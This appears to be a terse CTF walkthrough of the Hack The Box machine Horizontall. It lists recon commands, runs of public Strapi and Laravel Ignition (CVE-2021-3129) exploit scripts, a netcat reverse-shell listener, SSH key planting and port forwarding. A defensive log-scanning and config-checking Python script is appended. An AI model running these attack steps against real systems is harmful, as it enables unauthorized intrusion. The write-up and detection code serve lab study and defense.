nmap -A -p- -oA horizontall 10.129.207.161 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210903132214.png

nmap -sC -sV -O -p- -oA horizontall 10.129.207.161

nmap -sU -O -p- -oA horizontall-udp 10.129.207.161

nikto -h 10.129.207.161

dirsearch --url=http://10.129.207.161/ --threads=50 --random-agent -o control.html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

whatweb http://10.129.207.161

Pasted image 20210903132405.png

http://horizontall.htb

Pasted image 20210903132525.png

gobuster dns -d horizontall.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We find an api-prod subdomain

Pasted image 20210903133248.png

http://api-prod.horizontall.htb/users

Pasted image 20210903133622.png

http://api-prod.horizontall.htb/reviews

Pasted image 20210903133704.png

http://api-prod.horizontall.htb/admin/auth/login

Pasted image 20210903133901.png

Pasted image 20210903134047.png

https://thatsn0tmysite.wordpress.com/2019/11/15/x05/

python3 exploit.py admin@horizontall.htb http://api-prod.horizontall.htb admin

Here we can obtain the JWT

Pasted image 20210903135019.png

The credentials are admin:admin. We log in to the site.

Pasted image 20210903135235.png

https://bittherapy.net/post/strapi-framework-remote-code-execution

python3 exploit.py admin@horizontall.htb http://api-prod.horizontall.htb root

Pasted image 20210903135757.png

We curl the page

nc -lvnp 443

Pasted image 20210903135916.png

curl 127.0.0.1:8000

We see that it is Laravel

Pasted image 20210903140616.png

We create an id_rsa key and upload it to the server

Pasted image 20210903142037.png

python3 -m http.server 80

Pasted image 20210903142107.png

ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb

Pasted image 20210903143945.png

python3 exploit2.py http://localhost:8000 Monolog/RCE1 "whoami"

Pasted image 20210903143914.png

https://github.com/nth347/CVE-2021-3129_exploit

Pasted image 20210903144120.png
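The two footholds above (the Strapi admin-password reset and plugin-install abuse from the thatsn0tmysite and bittherapy posts, and the Laravel Ignition chain from CVE-2021-3129 on the internal port 8000 app) all leave traces a defender can look for. The following is an added example, not part of the original writeup or of any of the linked exploit repositories: it scans web-server access-log lines for those requests and checks a Laravel deployment for the two preconditions of CVE-2021-3129 (APP_DEBUG=true and facade/ignition older than 2.5.2). The endpoint paths come from the public advisories for those issues; the log lines, the .env text and the composer.lock fragment are constructed for the example.

```python
import json
import re

# Combined log format: client IP, method, path, status. The sample lines
# further down are constructed for this example, not captured from the box.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints named in the public Strapi and Laravel Ignition advisories.
STRAPI_FORGOT = "/admin/auth/forgot-password"
STRAPI_RESET = "/admin/auth/reset-password"
STRAPI_PLUGIN_INSTALL = "/admin/plugins/install"
IGNITION_EXEC = "/_ignition/execute-solution"


def scan_access_log(lines):
    """Return (ip, rule, path) alerts for requests that should not occur in production.

    - A successful admin password reset from an IP that never asked for a reset
      is the pattern of the Strapi reset abuse.
    - Installing plugins through the admin HTTP API is rare in production and is
      the channel of the Strapi command-injection RCE.
    - Ignition's execute-solution endpoint is only reachable with APP_DEBUG=true.
    """
    alerts = []
    asked_for_reset = set()  # IPs that POSTed to forgot-password first
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, status = m.group("ip"), m.group("method"), int(m.group("status"))
        path = m.group("path").split("?", 1)[0]
        if method == "POST" and path == STRAPI_FORGOT:
            asked_for_reset.add(ip)
        elif method == "POST" and path == STRAPI_RESET and status == 200:
            if ip not in asked_for_reset:
                alerts.append((ip, "strapi-reset-without-request", path))
        elif path == STRAPI_PLUGIN_INSTALL:
            alerts.append((ip, "strapi-plugin-install", path))
        elif method == "POST" and path == IGNITION_EXEC:
            alerts.append((ip, "laravel-ignition-execute-solution", path))
    return alerts


def parse_env(text):
    """Minimal KEY=VALUE parser for a Laravel .env file (comments and quotes stripped)."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        env[key.strip()] = value.strip().strip("\"'")
    return env


def version_tuple(version):
    """'v2.5.1' -> (2, 5, 1), so versions compare as numbers, not strings."""
    return tuple(int(p) for p in re.findall(r"\d+", version)[:3])


def check_laravel(env_text, composer_lock_text):
    """Report the CVE-2021-3129 preconditions found in .env and composer.lock."""
    findings = []
    if parse_env(env_text).get("APP_DEBUG", "false").lower() == "true":
        findings.append("APP_DEBUG=true: Ignition error page and its endpoints are exposed")
    for pkg in json.loads(composer_lock_text).get("packages", []):
        if pkg.get("name") == "facade/ignition" and version_tuple(pkg["version"]) < (2, 5, 2):
            findings.append(f"facade/ignition {pkg['version']} is older than 2.5.2 (fix for CVE-2021-3129)")
    return findings


# Constructed sample data (documentation-range IPs, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Sep/2021:13:50:19 +0000] "POST /admin/auth/reset-password HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Sep/2021:14:01:02 +0000] "POST /admin/auth/forgot-password HTTP/1.1" 200 2',
    '198.51.100.7 - - [03/Sep/2021:14:03:10 +0000] "POST /admin/auth/reset-password HTTP/1.1" 200 512',
    '203.0.113.5 - - [03/Sep/2021:13:57:57 +0000] "POST /admin/plugins/install HTTP/1.1" 200 15',
    '127.0.0.1 - - [03/Sep/2021:14:39:14 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 87',
    '203.0.113.5 - - [03/Sep/2021:13:36:22 +0000] "GET /reviews HTTP/1.1" 200 1421',
]
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=production\nAPP_DEBUG=true\n"
SAMPLE_LOCK = json.dumps({"packages": [{"name": "facade/ignition", "version": "2.5.1"}]})

if __name__ == "__main__":
    for ip, rule, path in scan_access_log(SAMPLE_LOG):
        print(f"ALERT {rule} from {ip} on {path}")
    for finding in check_laravel(SAMPLE_ENV, SAMPLE_LOCK):
        print(f"CONFIG {finding}")
```

Of the six constructed lines, three raise alerts: the reset from 203.0.113.5 that was never requested, the plugin install, and the Ignition call on the loopback-only Laravel app (which, as the port forward above shows, is still reachable by anyone with a shell as strapi). The reset from 198.51.100.7 is not flagged because that IP asked for a reset first. Both config findings are needed for CVE-2021-3129 to be exploitable, so turning APP_DEBUG off in production closes the Ignition endpoint even before the package is updated.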


copyright©2022 Cu3rv0x all rights reserved